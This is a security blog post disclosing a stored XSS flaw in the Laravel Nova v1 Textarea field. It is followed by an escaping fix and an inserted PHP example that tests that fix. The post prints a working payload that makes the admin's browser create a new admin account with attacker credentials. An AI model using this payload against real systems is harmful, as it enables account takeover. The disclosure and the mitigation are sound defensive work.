Taking Over Laravel Nova Admin Panel via an XSS Attack

September 11, 2020

While doing a penetration test for a client we noticed that the Laravel Nova Textarea field does not HTML-encode its content, which in this case led to an account takeover. The details are described below.

The client has a form on their website where customers can request a quote and that quote will be shown in the admin panel which is built on Laravel Nova.

We tried submitting

<input onfocus="alert('xss')" autofocus />  test

as a comment on the website.

Screenshot: XSS payload in the submit form

When the admin opened the requested quote details, the script executed in the admin panel.

Screenshot: Laravel Nova admin panel XSS

So using this vulnerability, we submitted the following code as a comment

<input 
   onfocus='Nova.request().post("/nova-api/users", 
   {name:"MaliciousUser", email: "MaliciousUser@example.com", password:      "test123", });' 
  autofocus />  
  test

which executed successfully when the admin opened the quote and created an admin account with the attacker's credentials. This allowed us to log in to the system as an admin.

Screenshot: XSS in Laravel Nova

Screenshot: Laravel admin panel takeover

We emailed the Laravel team about the vulnerability and got a response that they could not reproduce the issue on Nova v3, and would recommend upgrading the Nova version to v3.

If you are using Laravel Nova v1 and the upgrade will take longer, a temporary fix can also be to escape the output in the Textarea field's callback, so this is what we did as a temporary fix for the client until they upgrade to the new version.

// Escape the stored value on output so any HTML in it is shown as text
// instead of being rendered (and executed) in the admin panel.
Textarea::make('Additional Comments', function () {
  return e($this->additional_comments);
}),
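To make the mitigation concrete, here is an added stand-alone PHP example (not code from the post or from Laravel Nova) that performs the same encoding Laravel's e() helper does and checks that the comment submitted through the public form no longer reaches the admin view as live markup; the function names and the sample comment are assumptions constructed for the example.

```php
<?php
// Added example: stand-alone equivalent of Laravel's e() helper
// (htmlspecialchars with ENT_QUOTES, UTF-8) plus a regression check
// for the unescaped-Textarea bug described above.

function escapeForHtml(string $value): string
{
    // Encode &, <, >, " and ' so the value is inert both as element
    // content and inside attribute values.
    return htmlspecialchars($value, ENT_QUOTES, 'UTF-8');
}

// Regression check: does the rendered string still contain a tag that
// carries an on* event-handler attribute?
function containsEventHandlerMarkup(string $rendered): bool
{
    return preg_match('/<[a-z][^>]*\son[a-z]+\s*=/i', $rendered) === 1;
}

// Constructed sample comment, the same shape as the payload in the post.
$submittedComment = '<input onfocus="alert(\'xss\')" autofocus /> test';

// What the Nova v1 Textarea field showed the admin (unescaped) versus
// what the e() callback fix shows (escaped).
$unescaped = $submittedComment;
$escaped   = escapeForHtml($submittedComment);

printf("unescaped contains handler markup: %s\n",
    containsEventHandlerMarkup($unescaped) ? 'yes' : 'no');
printf("escaped contains handler markup:   %s\n",
    containsEventHandlerMarkup($escaped) ? 'yes' : 'no');
echo "escaped output: ", $escaped, "\n";
```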

📖 If you want to read more about Laravel Security, check out our Laravel Security Ebook.
